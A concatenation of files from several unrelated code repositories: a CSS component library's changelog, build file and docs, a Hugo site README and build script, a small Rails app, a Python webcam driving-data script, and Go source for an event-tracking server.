- [Patch] Add a `.lego-pane--scroll-x` for setting `overflow-x` to `auto`.
- [Patch] Add a `.pointer-events--none` trump for disabling pointer events.
- [Patch] Add a `.cursor--move` trump for changing the cursor to `move`.
- [Patch] Allow `.lego-overlay` to be extended with `%lego-overlay`.
### Fixed
- [Patch] Fix the name of the npm module and changed the privacy setting to false.
## [0.0.2][0.0.2] - 2015-07-13
### Fixed
- [Patch] Fix the broken links in `CHANGELOG.md`. (#60)
### Changed
- [Patch] `.lego-popover` was dependant on `.lego-block-list-group` for styling its `border`, `border-radius`, and `padding` of child elements, however this added other undesired styles to `.lego-popover`. This change removes the link between `.lego-popover` and `.lego-block-list-group`.
### Added
- [Patch] Add Travis CI support to the LEGO repository.
- [Patch] Update `CONTRIBUTING.md` to include information on Git tags
- [Patch] Updated README.md to include example code and usage instructions.
- [Patch] Added `src/scss/core.scss` file so that Core could be compiled.
- [Patch] Added `sass` task to gulpfile.js to compile Core.
- [Patch] Added `npm start` script into `package.json` to run tests.
- [Patch] Added `npm start` script into `package.json` to run install processes.
### Removed
- [Patch] Removed unneeded gems from Gemfile.
## 0.0.1 - 2015-06-24
### Added
- [Patch] Use semantic versioning in LEGO (#58).
[unreleased]: https://github.com/optimizely/lego/compare/v3.0.0...HEAD
[0.0.2]: https://github.com/optimizely/lego/compare/v0.0.1...v0.0.2
[0.0.3]: https://github.com/optimizely/lego/compare/v0.0.2...v0.0.3
[1.0.0]: https://github.com/optimizely/lego/compare/v0.0.3...v1.0.0
[2.0.0]: https://github.com/optimizely/lego/compare/v1.0.0...v2.0.0
[3.0.0]: https://github.com/optimizely/lego/compare/v2.0.0...v3.0.0
<file_sep>/gulpfile.js
var bump = require('gulp-bump'),
filter = require('gulp-filter'),
git = require('gulp-git'),
gulp = require('gulp'),
gutil = require('gulp-util'),
notify = require('gulp-notify'),
svgSymbols = require('gulp-svg-symbols'),
scsslint = require('gulp-scss-lint'),
symlink = require('gulp-symlink'),
sass = require('gulp-sass'),
path = require("path"),
tagVersion = require('gulp-tag-version');
var paths = {
// Limiting linter to first-part directories.
'styles' : [
'src/core/**/*.scss',
'!src/core/library/**/*.scss',
],
svgSource : 'src/img/svg-icons/*.svg',
svgDest : 'dist/img/',
css: './dist/css/',
core: './src/core/core.scss'
};
// Bumping version number and tagging the repository with it.
// Please read http://semver.org/
//
// https://www.npmjs.com/package/gulp-tag-version
//
// You can use the commands
//
// gulp patch # makes v0.1.0 → v0.1.1
// gulp feature # makes v0.1.1 → v0.2.0
// gulp release # makes v0.2.1 → v1.0.0
//
// To bump the version numbers accordingly after you did a patch,
// introduced a feature or made a backwards-incompatible release.
function increaseVersion(importance) {
// Get all the files to bump version in
return gulp.src(['./package.json'])
// Bump the version number in those files
.pipe(bump({type: importance}))
// Save it back to filesystem
.pipe(gulp.dest('./'))
// Commit the changed version number
.pipe(git.commit('New LEGO ' + importance + '.'))
// Read only one file to get the version number
.pipe(filter('package.json'))
// Tag it in the repository
.pipe(tagVersion());
}
// Creates SVG sprite and demo page.
// gulp svg
gulp.task('svg', function () {
return gulp.src(paths.svgSource)
.pipe(svgSymbols({
title: false,
templates: ['default-svg', 'default-demo']
}))
.pipe(gulp.dest(paths.svgDest));
});
gulp.task('sass', function() {
gulp.src(paths.core)
.pipe(sass({
errLogToConsole: true
}))
.pipe(gulp.dest(paths.css));
});
// Runs SCSS linter.
// gulp link
gulp.task('lint', function() {
gulp.src(paths.styles)
.pipe(scsslint({
'bundleExec': true,
'config': '.scss-lint.yml'
}))
.pipe(scsslint.failReporter());
});
// Symlink the .pre-commit file.
gulp.task('hook', function () {
return gulp.src('.pre-commit')
.pipe(symlink('.git/hooks/pre-commit', {
force: true
}));
});
// Release LEGO patch
// Bumps version from v0.1.0 to v0.1.1
gulp.task('patch', function() {
return increaseVersion('patch');
});
// Release LEGO feature
// Bumps version from v0.1.1 to v0.2.0
gulp.task('feature', function() {
return increaseVersion('minor');
});
// Release breaking LEGO change
// Bumps version from v0.2.1 to v1.0.0
gulp.task('release', function() {
return increaseVersion('major');
});
gulp.task('default');
<file_sep>/CONTRIBUTING.md
# Contributing to LEGO
1. Branch off of master: `git checkout -b username/branch-name`.
2. Make your changes, commit your code, and open a pull request against `master`. Add at least one reviewer.
3. Add your change to the "Unreleased" section of the `CHANGELOG.md` under one of the following sub-sections:
* **Added**: for new features.
* **Changed**: for changes in existing functionality.
* **Deprecated**: for once-stable features removed in upcoming releases.
* **Removed**: for deprecated features removed in this release.
* **Fixed**: for any bug fixes.
* **Security**: to invite users to upgrade in case of vulnerabilities.
Your message should follow the following format:
```
[Importance] Message (GitHub Issue Number)
```
Where `Importance` is:
* Patch
* Feature
* Release
GitHub issue number is the number of the GitHub issue, if applicable, preceded
by a `#`.
## Releasing a new version of LEGO
1. Open the `CHANGELOG.md` and look at the "Unreleased" contributions.
2. `git checkout master` and run `gulp patch`, `gulp feature`, or `gulp release` depending on the highest importance issue.
3. Update the `CHANGELOG.md` to reflect the new release and commit the change on `master`.
4. Push the changes to `master` with `git push` and `git push --tags`.
5. [Create a new release on GitHub](https://github.com/optimizely/lego/releases/new) using the version number gulp generated. Paste the "Unreleased" contributions from the `CHANGELOG.md` in the release notes.
6. Run `npm publish ./` to push the version to NPM. You must be a LEGO contributor on NPM to do this.
<file_sep>/README.md
# LEGO Component Library
This document contains two sets of instructions:
1. Including LEGO in your project
2. Contributing new CSS to LEGO
## Including LEGO in your project
LEGO is published as an npm module called `optimizely-lego`. To install:
```
npm install optimizely-lego --save-dev
```
which should add the dependency to your `package.json` file.
If using Gulp for your project:
```javascript
gulp.task('sass', function() {
gulp.src('scss/**/*.scss')
.pipe(sass({
errLogToConsole: true,
includePaths : [
require('optimizely-lego').includePath
]
}))
.pipe(gulp.dest('path/to/css'));
});
```
### Example Starter Code
Download [LEGO starter code](assets/lego-starter-code.zip) that includes the required file structure for new projects. Note that the paths to `core/...` will only work if the above gulp task is in place.
### Structure of LEGO
LEGO consists of two parts:
1. **Core**
- Base styles used as the foundation for any site.
- This code lives in this LEGO repository and is a dependency for platform code.
2. **Platform (.e.g, `mobile`)**
- Platform or device specific built on top of Core.
- This code lives in the platform repo, pulling Core as a dependency.
For example, if you're building a mobile site, `mobile.scss` would contain:
```scss
// # Mobile
// Root file driving the Mobile CSS.
// Compass polyfills
@import 'core/core-polyfills';
// ## Core functions and mixins
@import 'core/partials/elements/functions';
@import 'core/partials/elements/mixins';
// ## Core and p13n variables
// Import `core` and `mobile` variables
@import 'core/core-variables';
@import 'mobile/mobile-variables';
// ## Core and mobile partials
// Import `core` and `mobile` partials
@import 'core/core-partials';
@import 'mobile/mobile-partials';
// ## Trumps
// Trumps use `!important` classes for overrides and should always be loaded last.
@import 'core/partials/trumps/background';
@import 'core/partials/trumps/layout';
@import 'core/partials/trumps/margin';
@import 'core/partials/trumps/padding';
@import 'core/partials/trumps/type';
@import 'core/partials/trumps/sizing';
```
## Contributing to LEGO
The following is for users planning to make contributions to LEGO.
Important: see [CONTRIBUTING.md](CONTRIBUTING.md) for details on our versioning system.
After cloning the `lego` repo run:
```bash
npm start
```
This will run the npm `start` commands found in package.json that installs the dependencies.
### Cheat Sheet
- **`gulp`** : Runs the default compass watch process.
- **`gulp hook`** : Installs the linter pre-commit hook (please do this!).
- **`gulp lint`** : Runs the SCSS linter.
- **`gulp svg`** : Builds svg sprite and demo page into `dist`.
- **`gulp sass`** : Builds Core-only css file for testing into `dist`.
- **`gulp feature | patch | release`** : For tagging releases.
### Getting Started
#### Pre-Commit Hook & Linter
As part of the installation process above you should have run `gulp hook`. This will run the task that creates a git pre-commit hook. This hook fires a SCSS linter that checks to see that any SCSS files included in the commit conform to our [standards](https://github.com/optimizely/lego/blob/master/.scss-lint.yml). These rules ensure the LEGO SCSS is consistent.
If the the linter finds issues you'll see messages in your terminal like this:
[13:56:12] Using gulpfile /Library/WebServer/Documents/lego/gulpfile.js
[13:56:12] Starting 'lint'...
[13:56:12] Finished 'lint' after 4.32 ms
[13:56:15] 1 issues found in /Library/WebServer/Documents/lego/src/scss/desktop/_desktop-partials.scss
[13:56:15] /Library/WebServer/Documents/lego/src/scss/desktop/_desktop-partials.scss:24 [W] Files should end with a trailing newline
Here the 'lint' process ran and found 1 issue, providing the file, line number, and reason for the problem.
You can also run:
gulp lint
at any time to check your files before you commit.
#### Run the Sass compile process
To output Core CSS file to the `dist` directory run:
gulp sass
#### Generating the SVG Icon Sprite
When adding new icons to the library place the individual svg files into:
src/img/svg-icons
and then run:
gulp svg
The resulting sprite will be built to:
dist/img/svg-symbols.svg
This is the file that is included as the first child of the body on every page of Optimizely.
## Philosophy
LEGO stands for Low-level Elements and Global Objects. It's a collection of CSS/HTML/JS elements and objects meant to be combined and extended to create larger interfaces, influenced primarily by <NAME> work on [inuit.css](https://github.com/csswizardry/inuit.css/) and <NAME> [SMACSS](https://smacss.com/). The goals of this library are to provide code that is...
1. **Abstracted.** Component names shouldn't be derived from the content they contain. Class names should convey structural meaning.
1. **Reusable.** Components should be generic enough to be reused throughout the site. They should make no assumptions what page/view they will be used on. Problems solved in one area should be easily applied elsewhere.
1. **Mixable.** Components should be able to join together to create larger blocks.
1. **Powered by variables.** Nearly all design elements — colors, fonts, spacings, shadows — should be defined using the pre-existing [variables](https://github.com/optimizely/lego/blob/master/core/_core-variables.scss).
By achieving these goals our code becomes...
1. **Scalable.** Reusing patterns means new elements can be created faster and with minimal additional CSS.
1. **Consistent.** Not only will developers be able to read each other's code more easily we'll have a better end-user experience across the product.
1. **Smaller and [DRY](http://en.wikipedia.org/wiki/Don't_repeat_yourself)er.** Since we're constantly reusing low-level objects to build larger ones, often with Sass' <code>@extend</code> functionality, we cut down on CSS bloat. Less code means fewer bugs.
#### Writing Good Classes
In order to write HTML and CSS classes that provide meaning for developers we're using the BEM syntax. BEM stands for Block, Element, Modifier and is becoming a popular approach to building CSS and HTML that describes an object's internal relationships.
```html
<div class="lego-grid lego-grid--gutter">
<div class="lego-grid__cell">
<div class="docs-dummy-content">grid cell</div>
</div>
<div class="lego-grid__cell">
<div class="docs-dummy-content">grid cell</div>
</div>
<div class="lego-grid__cell">
<div class="docs-dummy-content">grid cell</div>
</div>
</div>
```
In the example above...
- **Block** is represented by <code>lego-grid</code> and is the parent class of the object.
- **Elements** are children of the object. They are named by joining the parent class name and a child class with a double underscore. In this case <code>lego-grid__cell</code>.
- **Modifiers** are variations on the default. In this case we have a <code>lego-grid--gutter</code>. This provides spacing between the cells.
Though somewhat verbose, this syntax makes it easy to determine the child/parent relationships between bits of code, especially when different objects are mixed together. It can be tricky naming elements so some judgment is required. This becomes easier over time.
For a longer discussion <NAME> provides a <a href="http://csswizardry.com/2013/01/mindbemding-getting-your-head-round-bem-syntax/">good introduction</a> to the syntax.
#### Futher Reading
- [MindBEMding – getting your head ’round BEM syntax](http://csswizardry.com/2013/01/mindbemding-getting-your-head-round-bem-syntax/). Introduction to BEM.
- [About HTML semantics and front-end architecture](http://nicolasgallagher.com/about-html-semantics-front-end-architecture/). What is a meaningful class name?
- [OOCSS + Sass = The best way to CSS](http://ianstormtaylor.com/oocss-plus-sass-is-the-best-way-to-css/). Some examples of bulding on existing objects using `@extend` in Sass.
- [Hacks for dealing with specificity](http://csswizardry.com/2014/07/hacks-for-dealing-with-specificity/). Some more technical details around specificity.
- [Normalising designs for better quality CSS (Video)](https://www.youtube.com/watch?v=ldx4ZFxMEeo). A conference presentation about normalizing designs and the process from design to HTML.
| eeba3c073ff7a82ed0a653e59b798dca587c45f1 | [
"Markdown",
"JavaScript"
] | 4 | Markdown | tjj5036/lego | 9cbef73f44260fe04027475444f260f2282539d6 | 853f899be9f4e1580bdee88ddd0d3ae8448c305e |
refs/heads/master | <file_sep># Welcome
Welcome to Harbor static website developed in Hugo. Hugo is an open-source static site generator. To find out more about hugo you can check out their [website](https://gohugo.io/) as well as [developer documentation](https://gohugo.io/documentation/)
# Project Setup
## Step 1: Clone project
```
$ git clone https://github.com/apparent/harbor-hugo.git <path>/<to>/<project>
```
> to install on the folder that you're currently only use following command:
>
> ```
> $ git clone https://github.com/apparent/harbor-hugo.git .
> ```
## Step 2: Install dependencies
Go to the root of the project and install dependencies using NPM.
```
$ cd themes/harbor/
$ npm install
```
## Step 3: Run on dev/local environment
Go to the root
```
$ cd <path>/<to>/<project root>
```
Start hugo server and keep listening to any changes on config,content,data,layouts,static or themes.
```
$ hugo server -D
```
or
```
$ hugo server -D --config config.yaml
```
*Here config.yaml is base config file and is identified by default.*
### Listening to scss changes
This project uses gulp and scss for frontend/project workflow. To keep listening to scss changes:
```
$ cd <path>/<to>/<project root>
$ cd themes/harbor/
$ make dev
```
*In this instance make dev is simply runing gulp's watch command.*
> ### Test Live config
> ```
> $ hugo server -D --config config.yaml,config-prod.yaml
> ```
>
> *Adding --config parameter in this fashion loads "**config.yaml**" first and then overrides any similar config with the ones in "**config-live.yaml**"*
## Step 4: Prepare for deployment to production
As Hugo is a static site generator, none of the dynamic hugo logic will work in the production. You will first need to render your project as a static HTML project using hugo cli command.
To render your project use following command:
```
#Build project for LIVE
$ sh build.sh -e live
#Build project for Staging
$ sh build.sh -e staging
#Build project for local
$ sh build.sh -e dev
# or,
$ sh build.sh
```<file_sep>#!/bin/bash
# -------------------- #
# --- Functions --- #
# -------------------- #
LogIt(){
#Set variables
local _message=$2
local _type=$1
local _color
#condition to select color
if [ $_type = "warning" ]
then
echo "\033[32m $_message \033[0m"
elif [ $_type = "error" ]
then
echo "\033[31m $_message \033[0m"
elif [ $_type = "success" ]
then
echo "\033[36m $_message \033[0m"
else
#default color
echo "\033[38m $_message \033[0m"
fi
}
# -------------------- #
# --- Script --- #
# -------------------- #
# Parse options
while getopts e:c option
do
case "${option}"
in
e) ENV=${OPTARG};;
c)
LogIt "warning" "Cleaning up residual css files from /themes/harbor/static/css"
rm -rf themes/harbor/static/css/core-*
LogIt "warning" "Cleaning up residual js files from /themes/harbor/static/js"
rm -rf themes/harbor/static/js/fresh-*
echo "\n";
;;
esac
done
LogIt "warning" "Initiating asset, css, static files build."
cd themes/harbor
gulp build
echo "\n";
LogIt "warning" "Building static project."
cd ../..
# Check if environment is defined and render correct environment
case $ENV in
live)
LogIt "warning" "Live: Cleaning up 'public' folder. ".
rm -rf public/*
hugo --config config.yaml,config-prod.yaml
cp LICENSE public/LICENSE
echo -n "goharbor.io" > public/CNAME
LogIt "success" "Live: Site build complete. Please check /public folder and deploy it using ftp,sftp or ssh".
;;
staging)
LogIt "warning" "Staging: Cleaning up 'public-staging' folder. ".
rm -rf public-staging/*
hugo --config config.yaml,config-stage.yaml
LogIt "success" "Staging: Site build complete. Please check /public-staging folder and deploy it using ftp,sftp or ssh".
;;
*)
LogIt "warning" "Dev: Cleaning up 'public-dev' folder. ".
rm -rf public-dev/*
hugo
LogIt "success" "Dev: Site build complete. Please check /public-dev folder."
;;
esac
| d2bc0905846f6e65611b04994a4464fb6bed59f5 | [
"Markdown",
"Shell"
] | 2 | Markdown | steven-zou/blog | a417e3eca8a1eb109d8082463c5e0b87cf298a7b | 8fc5489bbc4e9085c1bf158d7890bc9c208e4898 |
refs/heads/master | <file_sep>Rails.application.routes.draw do
resources :journals
root 'journals#index'
end
<file_sep>json.extract! @journal, :id, :title, :text, :created_at, :updated_at
| e538627f1c3298f26af1938cdc36236ce3a8d216 | [
"Ruby"
] | 2 | Ruby | ellisandy/docker-test | 02b43ec256628a56dcc5c18127c826ee8be575f6 | 845da70efd88e95c10b3175cc0f2e706d72c9c73 |
refs/heads/master | <file_sep># Using Android IP Webcam video .jpg stream (tested) in Python2 OpenCV3
import urllib
import cv2
import numpy as np
import time
# Replace the URL with your own IPwebcam shot.jpg IP:port
url='http://192.168.0.100:8080/shot.jpg'
while True:
# Use urllib to get the image from the IP camera
imgResp = urllib.urlopen(url)
image = cv2.imdecode(np.frombuffer(imgResp.read(), dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
# Numpy to convert into a array
#imgNp = np.array(bytearray(imgResp.read()),dtype=np.uint8)
# Finally decode the array to OpenCV usable format ;)
#image = cv2.imdecode(imgNp,-1)
cv2.imshow('image', image)
print(image.shape)
# put the image on screen
#cv2.imshow('IPWebcam',image)
height, width = image.shape
roi = image[int(height/2):height, :]
#print(roi.shape)
temp_array = roi.reshape(1, int(height/2) * width).astype(np.float32)
#To give the processor some less stress
#time.sleep(0.1)
# Quit if q is pressed
frame += 1
total_frame += 1
# get input from human driver
for event in pygame.event.get():
if event.type == KEYDOWN:
key_input = pygame.key.get_pressed()
# complex orders
if key_input[pygame.K_UP] and key_input[pygame.K_RIGHT]:
print("Forward Right")
X = np.vstack((X, temp_array))
y = np.vstack((y, self.k[1]))
saved_frame += 1
self.ser.write(chr(6).encode())
elif key_input[pygame.K_UP] and key_input[pygame.K_LEFT]:
print("Forward Left")
X = np.vstack((X, temp_array))
y = np.vstack((y, self.k[0]))
saved_frame += 1
self.ser.write(chr(7).encode())
elif key_input[pygame.K_DOWN] and key_input[pygame.K_RIGHT]:
print("Reverse Right")
self.ser.write(chr(8).encode())
elif key_input[pygame.K_DOWN] and key_input[pygame.K_LEFT]:
print("Reverse Left")
self.ser.write(chr(9).encode())
# simple orders
elif key_input[pygame.K_UP]:
print("Forward")
saved_frame += 1
X = np.vstack((X, temp_array))
y = np.vstack((y, self.k[2]))
self.ser.write(chr(1).encode())
elif key_input[pygame.K_DOWN]:
print("Reverse")
self.ser.write(chr(2).encode())
elif key_input[pygame.K_RIGHT]:
print("Right")
X = np.vstack((X, temp_array))
y = np.vstack((y, self.k[1]))
saved_frame += 1
self.ser.write(chr(3).encode())
elif key_input[pygame.K_LEFT]:
print("Left")
X = np.vstack((X, temp_array))
y = np.vstack((y, self.k[0]))
saved_frame += 1
self.ser.write(chr(4).encode())
elif key_input[pygame.K_x] or key_input[pygame.K_q]:
print("exit")
self.send_inst = False
self.ser.write(chr(0).encode())
self.ser.close()
break
elif event.type == pygame.KEYUP:
self.ser.write(chr(0).encode())
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# save data as a numpy file
file_name = str(int(time.time()))
directory = "training_data"
if not os.path.exists(directory):
os.makedirs(directory)
try:
np.savez(directory + '/' + file_name + '.npz', train=X, train_labels=y)
except IOError as e:
print(e)
end = cv2.getTickCount()
# calculate streaming duration
print("Streaming duration: , %.2fs" % ((end - start) / cv2.getTickFrequency()))
print(X.shape)
print(y.shape)
print("Total frame: ", total_frame)
print("Saved frame: ", saved_frame)
print("Dropped frame: ", total_frame - saved_frame)
<file_sep># SelfDrivingCar
Transforming a remote control car to an autonomous car which can steer and detect obstacles.
| 855f85217bfb0dd1c5ffd975c55e4fb06aaad1ef | [
"Markdown",
"Python"
] | 2 | Python | Othello11/SelfDrivingCar | 100928c146db32c8d14c1227a9f7f2e6441a114a | 2a1d785322f241885a9cddc286114aaa91067cc6 |
refs/heads/master | <repo_name>johnabfaria/bambus.py<file_sep>/pic_it.py
import os
def pic_it.snap(name):
new_name = """C:\Python33\Bambus\"""+name
os.rename("""C:\Python33\Bambus\Bambi.jpg""", new_name)
<file_sep>/README.md
bambus.py
=========
<file_sep>/main.py
import pic_it
import tweet_it
import txt_it
import drop_it
import pin
import time
"""
This is the main program that will use pin to id inputer from raspberry pi using RPi.GPIO
If input from IR motion sensor is positive, camera will be activated, photo snapped and saved locally
Photo will be tweeted and then uploaded to dropbox
A text message using Twilio will be sent to contact list with twitter link and dropbox direct link
"""
#while True():
for z in range(15)
print("Sensor null, run = {0}".format(z))
if pin.status:
time_snap = "{0}:{1}".format(time.localtime().tm_hour, time.localtime().tm_min)
name = "Bambus_pije_o: " + time
pic_it.snap(name)
tweet_it.send(name)
drop_it.upload(name)
txt_it.go(name)
time.sleep(5)
<file_sep>/text_it.py
from twilio.rest import TwilioRestClient
def go(name):
ACCOUNT_SID =
AUTH_TOKEN =
client = TwilioRestClient(ACCOUNT_SID, AUTH_TOKEN)
client.messages.create(
to="8474449672",
from_="+18474570275",
body= name,
)
<file_sep>/drop_it.py
import dropbox
"""
Uploads the file to dropbox
Generates download link
Returns download link
https://www.dropbox.com/developers/core/docs/python
"""
def upload(name)
app_key = 'xasdu3mcasb28iq'
app_secret = '<KEY>'
token =
#flow = dropbox.client.DropboxOAuth2FlowRedirect(app_key, app_secret)
client = dropbox.client.DropboxClient(token)
f = open("""C:\Python33\Bambus\Golden.jpg""", 'rb')
response = client.put_file('/Golden.jpg', f)
print("uploaded: ", response)
f.close()
x = client.share('/Golden.jpg')
print(x)
print("You can find the file at:")
print(x["url"])
return(x["url"])
<file_sep>/tweet_it.py
from twython import Twython
APP_KEY =
APP_SECRET =
OAUTH_TOKEN =
OAUTH_TOKEN_SECRET =
twitter = Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
def send(name)
photo = open("""C:\Pyhon33\Bambus\"""+name+".jpg", 'rb')
twitter.update_status_with_media(status=name, media=photo)
photo.close()
| 4cb87ce5e66097560fdbeb12979f45b8eb9dea6b | [
"Markdown",
"Python"
] | 6 | Python | johnabfaria/bambus.py | ada2e5f5e411e55ccf6b51e96cbeda46b0e2fc24 | 3bddc7511e773ce18edcca33439acec6a4ec1e96 |
refs/heads/master | <repo_name>Kuew/landmarkd<file_sep>/core/event.go
package core
import (
"time"
)
type Event struct {
Timestamp *time.Time `json:"timestamp"`
Data map[string]interface{} `json:"data"`
}
<file_sep>/projects/mock_test.go
package projects
import (
"net/http"
"github.com/skydb/sky.go"
"github.com/stretchr/testify/mock"
"time"
)
//--------------------------------------
// Redis Connection
//--------------------------------------
type mockRedisConn struct {
mock.Mock
}
func (c *mockRedisConn) Close() error {
args := c.Mock.Called()
return args.Error(0)
}
func (c *mockRedisConn) Err() error {
args := c.Mock.Called()
return args.Error(0)
}
func (f *mockRedisConn) Do(commandName string, arg ...interface{}) (interface{}, error) {
args := f.Mock.Called(commandName, arg)
return args.Get(0), args.Error(1)
}
func (f *mockRedisConn) Send(commandName string, arg ...interface{}) error {
args := f.Mock.Called(commandName, arg)
return args.Error(0)
}
func (f *mockRedisConn) Flush() error {
args := f.Mock.Called()
return args.Error(0)
}
func (f *mockRedisConn) Receive() (interface{}, error) {
args := f.Mock.Called()
return args.Get(0), args.Error(1)
}
//--------------------------------------
// Sky Client
//--------------------------------------
type mockSkyClient struct {
mock.Mock
}
func (c *mockSkyClient) GetTable(name string) (sky.Table, error) {
args := c.Mock.Called(name)
return args.Get(0).(sky.Table), args.Error(1)
}
func (c *mockSkyClient) GetTables() ([]sky.Table, error) {
args := c.Mock.Called()
return args.Get(0).([]sky.Table), args.Error(1)
}
func (c *mockSkyClient) CreateTable(table sky.Table) error {
args := c.Mock.Called(table)
return args.Error(0)
}
func (c *mockSkyClient) DeleteTable(table sky.Table) error {
args := c.Mock.Called(table)
return args.Error(0)
}
func (c *mockSkyClient) Ping() bool {
args := c.Mock.Called()
return args.Bool(0)
}
func (c *mockSkyClient) Send(method string, path string, data interface{}, ret interface{}) error {
args := c.Mock.Called(method, path, data, ret)
return args.Error(0)
}
func (c *mockSkyClient) URL(path string) string {
args := c.Mock.Called(path)
return args.String(0)
}
func (c *mockSkyClient) HTTPClient() *http.Client {
args := c.Mock.Called()
return args.Get(0).(*http.Client)
}
//--------------------------------------
// Sky Table
//--------------------------------------
type mockSkyTable struct {
mock.Mock
}
func (t *mockSkyTable) Name() string {
args := t.Mock.Called()
return args.String(0)
}
func (t *mockSkyTable) Client() sky.Client {
args := t.Mock.Called()
return args.Get(0).(sky.Client)
}
func (t *mockSkyTable) SetClient(client sky.Client) {
t.Mock.Called(client)
}
func (t *mockSkyTable) GetProperty(name string) (*sky.Property, error) {
args := t.Mock.Called(name)
return args.Get(0).(*sky.Property), args.Error(1)
}
func (t *mockSkyTable) GetProperties() ([]*sky.Property, error) {
args := t.Mock.Called()
return args.Get(0).([]*sky.Property), args.Error(1)
}
func (t *mockSkyTable) CreateProperty(property *sky.Property) error {
args := t.Mock.Called(property)
return args.Error(0)
}
func (t *mockSkyTable) UpdateProperty(name string, property *sky.Property) error {
args := t.Mock.Called(name, property)
return args.Error(0)
}
func (t *mockSkyTable) DeleteProperty(property *sky.Property) error {
args := t.Mock.Called(property)
return args.Error(0)
}
func (t *mockSkyTable) GetEvent(objectId string, timestamp time.Time) (*sky.Event, error) {
args := t.Mock.Called(objectId, timestamp)
return args.Get(0).(*sky.Event), args.Error(1)
}
func (t *mockSkyTable) GetEvents(objectId string) ([]*sky.Event, error) {
args := t.Mock.Called(objectId)
return args.Get(0).([]*sky.Event), args.Error(1)
}
func (t *mockSkyTable) AddEvent(objectId string, event *sky.Event, method string) error {
args := t.Mock.Called(objectId, event, method)
return args.Error(0)
}
func (t *mockSkyTable) DeleteEvent(objectId string, event *sky.Event) error {
args := t.Mock.Called(objectId, event)
return args.Error(0)
}
func (t *mockSkyTable) Stream(f func(*sky.EventStream)) error {
args := t.Mock.Called(f)
return args.Error(0)
}
func (t *mockSkyTable) Stats() (*sky.Stats, error) {
args := t.Mock.Called()
return args.Get(0).(*sky.Stats), args.Error(1)
}
func (t *mockSkyTable) RawQuery(q map[string]interface{}) (map[string]interface{}, error) {
args := t.Mock.Called(q)
return args.Get(0).(map[string]interface{}), args.Error(1)
}
<file_sep>/README.md
landmarkd
=========
The Landmark Tracking Server.
<file_sep>/config/config.go
package config
import (
"github.com/BurntSushi/toml"
"io"
"os"
)
const (
DefaultPort = 9500
DefaultPidPath = "/var/run/landmarkd.pid"
)
// The configuration for running landmarkd.
type Config struct {
Port int `toml:"port"`
PidPath string `toml:"pid-path"`
}
// Creates a new configuration object.
func NewConfig() *Config {
return &Config{
Port: DefaultPort,
PidPath: DefaultPidPath,
}
}
// Decodes the configuration from a TOML reader.
func (c *Config) Decode(r io.Reader) error {
if _, err := toml.DecodeReader(r, &c); err != nil {
return err
}
return nil
}
// Decodes the configuration from a TOML file path.
func (c *Config) DecodeFile(path string) error {
f, err := os.Open(path)
if err != nil {
return err
}
defer f.Close()
if err = c.Decode(f); err != nil {
return err
}
return nil
}
<file_sep>/projects/store.go
package projects
import (
"fmt"
"errors"
"github.com/skydb/sky.go"
"net/url"
)
type Store interface {
Open() error
Close()
FindByApiKey(string) (*Project, error)
}
// Creates new store based on a connection URI.
func NewStore(client sky.Client, uri string) (Store, error) {
if client == nil {
return nil, errors.New("Sky client required for project store")
}
u, err := url.Parse(uri)
if err != nil {
return nil, err
}
switch u.Scheme {
case "redis":
return NewRedisStore(client, u), nil
default:
return nil, fmt.Errorf("Invalid store scheme: %s", u.Scheme)
}
}
<file_sep>/server/server.go
package server
import (
"fmt"
"github.com/gorilla/mux"
"log"
"net/http"
)
type Server struct {
router *mux.Router
httpServer *http.Server
}
// Creates a new server.
func New() *Server {
return &Server{
router: mux.NewRouter(),
}
}
// Starts the server.
func (s *Server) ListenAndServe(port int) error {
s.httpServer = &http.Server{
Addr: fmt.Sprintf(":%d", port),
Handler: s.router,
}
s.router.HandleFunc("/track", s.trackHandler).Methods("GET")
s.router.HandleFunc("/track.gif", s.trackHandler).Methods("GET")
log.Printf("Running at http://localhost%s/", s.httpServer.Addr)
return s.httpServer.ListenAndServe()
}
// Tracks a single event to a project.
func (s *Server) trackHandler(w http.ResponseWriter, r *http.Request) {
// TODO: Parse query parameters.
// TODO: Lookup project by API Key.
// TODO: Send event against project.
}
<file_sep>/core/device.go
package core
type Device struct {
Id string `json:"id"`
}
<file_sep>/config/config_test.go
package config
import (
"bytes"
"testing"
"github.com/stretchr/testify/assert"
)
const testConfig = `
port=9000
pid-path = "/home/pid"
`
func TestDecode(t *testing.T) {
config := NewConfig()
err := config.Decode(bytes.NewBufferString(testConfig))
assert.Nil(t, err)
assert.Equal(t, config.Port, 9000)
assert.Equal(t, config.PidPath, "/home/pid")
}
<file_sep>/main.go
package main
import (
"flag"
"io/ioutil"
"log"
"os"
"runtime"
"strconv"
. "github.com/skylandlabs/landmarkd/config"
"github.com/skylandlabs/landmarkd/server"
)
var config *Config
var configPath string
func init() {
config = NewConfig()
flag.StringVar(&configPath, "c", "", "the path to the config file")
}
func main() {
flag.Parse()
if configPath != "" {
if err := config.DecodeFile(configPath); err != nil {
log.Fatal("Config error:", err)
}
}
// Initialize.
runtime.GOMAXPROCS(runtime.NumCPU())
writePidFile()
// Run server.
s := server.New()
log.Fatal(s.ListenAndServe(config.Port))
}
func writePidFile() {
pid := strconv.Itoa(os.Getpid())
ioutil.WriteFile(config.PidPath, []byte(pid), 0644)
}
<file_sep>/projects/redis_store.go
package projects
import (
"fmt"
"github.com/garyburd/redigo/redis"
"github.com/skydb/sky.go"
"net/url"
"sync"
)
type RedisStore struct {
sync.Mutex
client sky.Client
uri *url.URL
conn redis.Conn
projects map[string]*Project
}
// Creates a new Redis-backed project store.
func NewRedisStore(client sky.Client, uri *url.URL) *RedisStore {
return &RedisStore{
client: client,
uri: uri,
projects: make(map[string]*Project),
}
}
// Retrieves the host and port used to connect to Redis.
func (s *RedisStore) Host() string {
return s.uri.Host
}
// Retrieves the hash key used to lookup projects.
func (s *RedisStore) HashKey() string {
if s.uri.Path == "" {
return "ldmk_projects"
}
return s.uri.Path[1:]
}
// Opens a connection to Redis.
func (s *RedisStore) Open() error {
s.Lock()
defer s.Unlock()
// Close the store if it's already open.
s.close()
// Open a new connection to Redis.
var err error
if s.conn, err = redis.Dial("tcp", s.Host()); err != nil {
return err
}
return nil
}
// Cleans up any remote connections.
func (s *RedisStore) Close() {
s.Lock()
defer s.Unlock()
s.close()
}
func (s *RedisStore) close() {
if s.conn != nil {
s.conn.Close()
s.conn = nil
}
}
// Looks up a project by API key. The store will look for a cached copy
// first and then check Redis.
